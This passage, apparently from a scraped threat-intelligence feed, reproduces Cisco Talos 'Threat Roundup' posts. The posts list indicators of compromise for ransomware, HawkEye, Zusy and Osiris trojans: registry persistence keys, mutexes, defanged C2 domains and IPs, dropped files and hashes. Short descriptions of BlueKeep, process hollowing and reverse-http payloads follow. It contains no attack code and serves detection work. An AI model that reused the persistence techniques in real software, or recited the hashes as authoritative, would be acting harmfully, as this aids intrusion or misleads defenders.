NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: Impersonate ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: Asynchronous ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: MaxWait ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: DllName ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\FROSTDM \nValue Name: Startup ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: frostdm ` | 2 \n`<HKCU>\\Software\\Microsoft\\<random, matching '[A-Z][a-z]{3,11}'> ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: webappsstore.exe ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bookmarks-2017-10-03.exe ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IRIF \nValue Name: Pyursy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KUWY \nValue Name: Naember ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\8B5BAAB9E36E4507C5F5.lock` | 22 \n`A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A` | 10 \n`A9ZLO3DAFRVH1WAE` | 2 \n`AhY93G7iia` | 2 \n`B81XZCHO7OLPA` | 2 \n`BSKLZ1RVAUON` | 2 \n`F-DAH77-LLP` | 2 \n`FURLENTG3a` | 2 \n`FstCNMutex` | 2 \n`GJLAAZGJI156R` | 2 \n`I-103-139-900557` | 2 \n`J8OSEXAZLIYSQ8J` | 2 \n`LXCV0IMGIXS0RTA1` | 2 \n`MKS8IUMZ13NOZ` | 2 \n`OLZTR-AFHK11` | 2 \n`OPLXSDF19WRQ` | 2 \n`PLAX7FASCI8AMNA` | 2 \n`RGT70AXCNUUD3` | 2 \n`TEKL1AFHJ3` | 2 \n`TXA19EQZP13A6JTR` | 2 \n`VSHBZL6SWAG0C` | 2 \n`chimvietnong` | 2 \n`drofyunfdou` | 2 \n`kliaduosix` | 2 \n`limdouxdaz` | 2 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`93[.]125[.]99[.]121` | 22 \n`185[.]135[.]88[.]105` | 22 \n`146[.]66[.]72[.]87` | 22 \n`87[.]236[.]16[.]31` | 22 \n`217[.]160[.]0[.]234` | 22 \n`69[.]73[.]180[.]151` | 22 \n`171[.]244[.]34[.]167` | 22 \n`217[.]174[.]149[.]130` | 22 \n`178[.]238[.]37[.]162` | 22 \n`179[.]188[.]11[.]34` | 22 \n`89[.]252[.]187[.]72` | 22 \n`77[.]104[.]144[.]25` | 22 \n`202[.]43[.]45[.]181` | 22 \n`217[.]160[.]0[.]27` | 22 \n`92[.]53[.]96[.]201` | 22 \n`213[.]186[.]33[.]3` | 22 \n`50[.]87[.]58[.]165` | 22 \n`77[.]104[.]171[.]238` | 22 \n`194[.]154[.]192[.]67` | 22 \n`204[.]11[.]56[.]48` | 22 \n`23[.]236[.]62[.]147` | 22 \n`213[.]186[.]33[.]5` | 22 \n`217[.]70[.]184[.]50` | 22 \n`52[.]58[.]78[.]16` | 22 \n`66[.]96[.]147[.]103` | 22 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`big-game-fishing-croatia[.]hr` | 22 \n`www[.]lagouttedelixir[.]com` | 22 \n`www[.]himmerlandgolf[.]dk` | 22 \n`zaeba[.]co[.]uk` | 22 \n`bellytobabyphotographyseattle[.]com` | 22 \n`www[.]wash-wear[.]com` | 22 \n`www[.]poketeg[.]com` | 22 \n`boatshowradio[.]com` | 22 \n`www[.]perfectfunnelblueprint[.]com` | 22 \n`perovaphoto[.]ru` | 22 \n`www[.]cakav[.]hu` | 22 \n`goodapd[.]website` | 22 \n`www[.]ismcrossconnect[.]com` | 22 \n`www[.]fabbfoundation[.]gm` | 22 \n`alem[.]be` | 22 \n`cevent[.]net` | 22 \n`mauricionacif[.]com` | 22 \n`cyclevegas[.]com` | 22 \n`oceanlinen[.]com` | 22 \n`6chen[.]cn` | 22 \n`koloritplus[.]ru` | 22 \n`asl-company[.]ru` | 22 \n`www[.]krishnagrp[.]com` | 22 \n`test[.]theveeview[.]com` | 22 \n`picusglancus[.]pl` | 22 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\ntuser.ini` | 22 \n`%APPDATA%\\Microsoft\\Media Player\\KRAB-DECRYPT.txt` | 22 \n`%HOMEPATH%\\AppData\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Media Center Programs\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Credentials\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Internet Explorer\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Document Themes\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\SmartArt Graphics\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Document Themes\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Document Themes\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\SmartArt Graphics\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\SmartArt Graphics\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Word Document Building Blocks\\1033\\KRAB-DECRYPT.txt` | 22 \n`%APPDATA%\\Microsoft\\Templates\\LiveContent\\User\\Word Document Building Blocks\\KRAB-DECRYPT.txt` | 22 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0682b36ae0be779eb1ad4d3e0d8958a08ad8e044609a6cee5af314ed4d94f237 0c7d85f6f2e1e16ca7bef272edffdb0d513ce0f050347578600cdac206e048bd 1483d05311d9c544e404bf3b35e1bc80a154dd9b5d9757a24b99569cc5ddf680 17133d42590782a30f8464c7446d6a202299daf3cf8391ea40883d17e9d367ed 17ef571b3e2bbbb215ebfb291a1a4c17169a7a5ff0720718720eadacd4500830 1d69bee79a17d872422f9aada2d4b4ee4c048a8932ef50885c9d327cf225af4c 20cf2009ca1e7155b428ae8c76ab0baf7196aaa4c0d2bb7b9aa452a595d4a3ac 2135b77151f05d56f91a8c652edaf6b7a28ae26300b1550b5d28672131aee95e 245efbc6f214ff0d5726c671b51ba0569edf83666c557152b54c494821bc0a7f 2481c8679ec7110d1811fd1578862b9f1b7439c1d818bd4102ebe31cb7e706c7 27b4c02d76cf9845056d456244cd093d86880101f4f6971323814a5eabc7e7b0 292ba930f72bbfa23dab563c3f35ec157a0374b8b3f34f122c6a5997a3daa81b 318cff626b73c4508e9860b2d9ad8a5b53f93637a9a4b9b21cec27c0dde10dcf 37bf027ea0235e19e6d72597c45721c99b9ec619982f7d948e8ddfa2742ef6ae 39eb43c190b49a55de56873a0947d32177bb183791d1f696ff102f75c9b1dca2 3debcef78d8f77548491144e69fde1d89f7b5392b09b1b51f4df061aa622c706 420fe4c2431f23d3a7c4044cdcb71d434daded7c127da6fd1a150c322dcde5e4 670cba74908e2755ace9382cbbd26016fa4c66d7794958fe2d51530100aaaa2a 6a6bc4b3e2c460141981ba83a3a933e35adddc4814a3ffca8e329a5c63a149b8 708bf234cb01321625bf94fd58ece8719ce405b0f0895c59b9a1634b532b6307 73aeb522487874825cbe13567a86280273f90b8a4ee2367f758f393fc24a406e 77b0e7632645006d4a456b314a1899c6c0aba73dcaf74cdbe91bf946c7c9ea98 7a8a1c55a55adfea28a36ef6b6c4836990d62dfb941dfe3ba68e6c32fe7d9874 7dd4779ce5a53500c292236d9b9b062c99cec62ef118aae15a752362fd4e0358 87182baddbc7e1915abd036980c7554a7ee4f7281055772fd851ce67284a6616 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-EqM5h1pjJHw/Xf0GzaDIFDI/AAAAAAAADEg/vsToWCMYlgA2x6545gawfH4VRjtFtrlvgCLcBGAsYHQ/s1600/318cff626b73c4508e9860b2d9ad8a5b53f93637a9a4b9b21cec27c0dde10dcf_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pAIKH3uRpx0/Xf0G3NA_exI/AAAAAAAADEk/Lz5VGq8eQtU44jwFyHU8l2h8LbQrbAvwACLcBGAsYHQ/s1600/f7d7c3c2f18131b432af6b8cfa03bebbbce9e1fe914cef79f4464ab4dda1baad_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-2_OrUR0VFSA/Xf0G85OlwaI/AAAAAAAADEo/ZKVdId7_TMonOi-VQdzTDEY66dqP-7xYQCLcBGAsYHQ/s1600/17133d42590782a30f8464c7446d6a202299daf3cf8391ea40883d17e9d367ed_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.HawkEye-7455512-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Update ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Registry Key Name ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 6 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]16[.]155[.]36` | 5 \n`82[.]221[.]130[.]149` | 3 \n`104[.]16[.]154[.]36` | 3 \n`208[.]91[.]198[.]143` | 2 \n`204[.]11[.]56[.]48` | 1 \n`23[.]94[.]43[.]90` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`whatismyipaddress[.]com` | 8 \n`www[.]macniica[.]com` | 4 \n`smtp[.]vivaldi[.]net` | 3 \n`us2[.]smtp[.]mailhostbox[.]com` | 2 \n`smtp[.]believelogs[.]com` | 2 \n`www[.]swift-be[.]com` | 1 \n`smtp[.]umcship-tw[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\pid.txt` | 8 \n`%APPDATA%\\pidloc.txt` | 8 \n`%TEMP%\\holdermail.txt` | 8 \n`%TEMP%\\holderwb.txt` | 8 \n`%TEMP%\\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 8 \n`%APPDATA%\\D282E1` | 6 \n`%APPDATA%\\D282E1\\1E80C5.lck` | 6 \n`%APPDATA%\\WindowsUpdate.exe` | 6 \n`%TEMP%\\subfolder` | 1 \n`%TEMP%\\subfolder\\filename.exe` | 1 \n`%TEMP%\\subfolder\\filename.vbs` | 1 \n \n#### File Hashes\n\n` 1cb99e6bb3f83d21bc06877531beb9bc652e311a5e49747062bbef5c5501cc70 2701a8daf4384bd6842ef6bb2bfc4c0418b204dfce07ef69b251a2c5de593e01 4688f2885e00eea958abbc479e875708c6e9f2347cb9ef5af4e8881c9b3b8439 525dae4004eed37854b1a6ce2046280a3c1d14f9d79c34447a6bf297d3313dca 6ac5e9684bd5bad7070d674da4786eee6827f5d88bd076aa0dc7f7d734d666e3 7036562647bece05ea15c2b3bea5ab4b40c3a965a5272d3a24dcb7af8930d8a5 75f3b9c29533c3b67b040a211d9acc2860ce3f224200d5985b69319210478fb4 7d494230588aedf9bb8700105b6c5cf2383efa5dda79daa3752f9f13b92dad2c a306d0e9ba34a447d09b932a9ab125406872672212534e9aeb3a9d81338ff4d0 af7ff1a7242dbd0d142c03bfe23fd84f24b5dce494cca6545a6409548ae09c9e c24a1e52447710a56f0e1de99401197fd2abebaa15c18de7aa0fa9548d7b15c5 c79783e0d3330fc51bcc92714e8663234c7443ad9245046a5072685c9fa6a86f ceec143cb503f31efadadc2ca82cb74d52b08566ddde6bcba26da248d0fadb20 e52e3ffeb93c7794f2631ee2d9ac0dace29c1be8b4e0723db344879b23e9cfe4 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0lOO8svNQCc/Xf0HNsu1BVI/AAAAAAAADE0/cEnYTdm-GvYd497LTV26dCFzGfN1gyLAQCLcBGAsYHQ/s1600/c79783e0d3330fc51bcc92714e8663234c7443ad9245046a5072685c9fa6a86f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-zVXfjiXuTtI/Xf0HSvMiBxI/AAAAAAAADE4/0Len_QlrcxIhiuvcxj1rljBRIaKkPcWngCLcBGAsYHQ/s1600/c24a1e52447710a56f0e1de99401197fd2abebaa15c18de7aa0fa9548d7b15c5_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-e66AbVVWUzg/Xf0HZb0n9NI/AAAAAAAADE8/y_aUoYiSo8oFBSFte64rbW8HUVoatJ9SQCLcBGAsYHQ/s1600/75f3b9c29533c3b67b040a211d9acc2860ce3f224200d5985b69319210478fb4_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (24210) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (295) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (161) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (143) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (112) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (98) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nExcessively long PowerShell command detected \\- (89) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nSpecial Search Offer adware \\- (45) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \nReverse http payload detected \\- (26) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nCorebot malware detected \\- (25) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2019-12-20T10:07:43", "published": "2019-12-20T10:07:43", "id": "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/gN121cJK8cQ/threat-roundup-1213-1220.html", "type": "talosblog", "title": "Threat Roundup for December 13 to December 20", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-04T17:31:33", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 27 and Oct. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d9760d0b0164.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Malware.Zusy-7191579-1 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Malware.Osiris-7191711-1 | Malware | Osiris is a banking trojan derived from the Kronos banking trojan and is known to include features such as the ability to communicate with its command and control (C2) servers via Tor and the ability to intercept credentials typed into web forms. \nWin.Dropper.Cerber-7192026-0 | Dropper | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Virus.Expiro-7192043-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks. \nWin.Malware.Neurevt-7192122-0 | Malware | Neurevt, also known as BetaBot, is a remote access trojan that employs multiple anti-debug and anti-analysis techniques to attempt to avoid detection. \nDoc.Dropper.Emotet-7181950-0 | Dropper | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Malware.Zusy-7191579-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EEFEB657 ` | 82 \nMutexes | Occurrences \n---|--- \n`EEFEB657` | 87 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]218[.]185[.]162` | 54 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`brureservtestot[.]cc` | 57 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\AppData\\LocalLow\\EEFEB657` | 84 \n`%APPDATA%\\EEFEB657` | 82 \n`%APPDATA%\\EEFEB657\\bin.exe` | 82 \n \n#### File Hashes\n\n` 027ecc7f1e2d38d420486e9e0fe9d50bdceb8b50512258a922e69f55e0c18ec7 0a72c56814a288218c9346115935828be03e870fa858a721f738af4dab311205 0a9fd449b13193c771c2d401dd6538cab6dbb2c37e0573b05cc72802b90687cf 0b1fa36c3ae5bdb7c52c40e08566cceac37965265e5b2552fdf121add431ce45 0ce401aa748f86238016408aa5c7b082a83499a2cbf2d5a1370b3bef8b983be1 1266c2bccc5fa61af8b611d3c7f210b11fed7d22dbb24305bf6003b1891399fe 12ef657ff31b48b90fbb20b212643f7aa62b66dae80cd19feed7356089f18451 149e17e85475bf4f6b4be6c0f1924e8554ec982f949fcb833c8c6bc3a7673669 1a0d6dda8e405f9342fadc87a1a6b395250bfcf910f5e2e4cfba806de2b58eee 1b3ddf7b2a71290a0a86e974a323dde16999e7eaa2be2b8cd63c066a7ba6a052 1fa747673986b53ed65fa0a6b39a024ef02191966184a6fd8844e742fdbc3d58 22b172ead1618e0c49a6d94c4da6c7ba1d401549276bc3a7f3d78c18909e6793 2b9b82e7ee0d8661b2268f83a010e8379e28930cc7f9f224d06fcd37b48f566d 2ba984bf6a2e039225b78faf309d087db56a6a2eac5efc73f5f20ff941c58442 2c33aa852da4527f49dae1e6bb1940b4c7cd2c814da0a90ab8a2a5de5fee6726 2c594bcf891b90e24c8bd445d5ddbe9cb50f5d101d559d564ab8246535d2af53 306774877254b8ca51a2bf446834cc34126ac56ebaf9d935442c25e533485fc1 38efe6d2c2e264e83d54cebc4bb14766c344741e39b510b027882d1ef2bbb798 43aee0e0761a3e90aa35d3401634397be8d1691d88ed2bdaaf2f60c915de53e2 467e66e8fc95c740cc3beee432d6a5e85bc533aa6dd609865376dacf0a0ef6e7 47bc6db08ad7826b5a68644d6f013405e4e6842525b8a4d05a2abdabfd735fc4 484f52c4598eddc67147f8558c9bf9701d1c4d2f5bcc1b619a43422863d1e8ce 48624a37bd7f3faacc3d56c106a40189c413dc4ec4407c00a1034578cfb6a9b3 4a3a67a893cf7e49a5aef587d840867589841e93ae7f418019d6f94daba58c47 4bd1deaa13a4a9cef75f84dba895645a24ac7f4b4bd69d22ea5800a3c682cc54 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4u15Rz65tAA/XZddgxYFSlI/AAAAAAAACt0/c4t_kH8jhUEQEz011XGkTQNN5jhgH0sWgCLcBGAsYHQ/s1600/484f52c4598eddc67147f8558c9bf9701d1c4d2f5bcc1b619a43422863d1e8ce_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i65rPHuheuE/XZddvf8boEI/AAAAAAAACt4/qqj9VP2GX9QS_ysbtho1KxieEbpffk_iwCLcBGAsYHQ/s1600/74e955ce1d18be739ac0292e506146820140ba5e40cc15cfc142fdb40553174b_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ahFkjjuMKQk/XZdd0sofcnI/AAAAAAAACuA/Eqquits2mwonPN2PUSGRy9wVIAabFQp1ACLcBGAsYHQ/s1600/2b32ffb0a0bcb61882ac3907d11afd5428054ac7e9ee4aa6dabca24277e51dee_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Osiris-7191711-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: HideFileExt ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: d41d8cd9 ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION \nValue Name: d41d8cd9 ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: d41d8cd9 ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: d41d8cd9 ` | 11 \nMutexes | Occurrences \n---|--- \n`Global\\d41d8cd98f00b204e9800998ecf8427e` | 11 \n`Global\\{B1F6EFF9-6297-200E-B1F6-F9EF29AA7A00}` | 11 \n`Global\\{BF6093C4-5FBA-D878-BF60-C4933C20A000}` | 9 \n`Global\\dd4b21e9ef71e1291183a46b913ae6f2` | 9 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`updateserver4[.]top` | 11 \n`updateserver7[.]top` | 11 \n`updateserver5[.]top` | 11 \n`updateserver9[.]top` | 11 \n`updateserver2[.]top` | 11 \n`updateserver8[.]top` | 11 \n`updateserver10[.]top` | 11 \n`updateserver6[.]top` | 11 \n`updateserver3[.]top` | 11 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\<profile ID>.default\\user.js` | 11 \n`%System32%\\CatRoot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb` | 9 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BFA-8553-0BE17726FCD5}` | 4 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BFA-8553-0BE17726FCD5}\\d41d8cd9.exe` | 4 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BE2-8553-13E17726E4D5}` | 2 \n`%APPDATA%\\Microsoft\\{56984C2C-8905-4BE2-8553-13E17726E4D5}\\d41d8cd9.exe` | 2 \n`%APPDATA%\\Microsoft\\{9A96A2D0-FE36-485E-B81C-0132628C474C}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{03FFB58D-7238-49DA-9378-5224CBD1F546}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{575A5E0A-FD63-4DF1-BF50-033349A4ADA1}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{33C67668-6248-47D0-8FDF-197713CA89A1}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{FA144B4E-77DF-4C1F-A472-60E20FF489C2}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{507C47B0-1E13-4926-92BC-C40E8A4CB040}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{F807BD90-CAC5-40B0-828A-CA06ED52C5F4}\\dd4b21e9.exe` | 1 \n`%APPDATA%\\Microsoft\\{780EBCFD-EADA-4438-9DC3-324538311844}\\dd4b21e9.exe` | 1 \n \n#### File Hashes\n\n` 05ba5705db7ff502d4422ea7d4ef32422d9b2c0966a42b6b3d76c126d51e846d 0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5 2c5fdc198324cc33dc93d20dc58195608661ed5c83cf10619efdbc1fddeb51e5 4c6f284b0be38d51af26ee87e687cbba32184e0b21203758419953e1f476e841 4f645f4ae3dcf8bfebf4dde1b6d20497ce25fbbc1f6f691d40a95d7bff7a2d6c 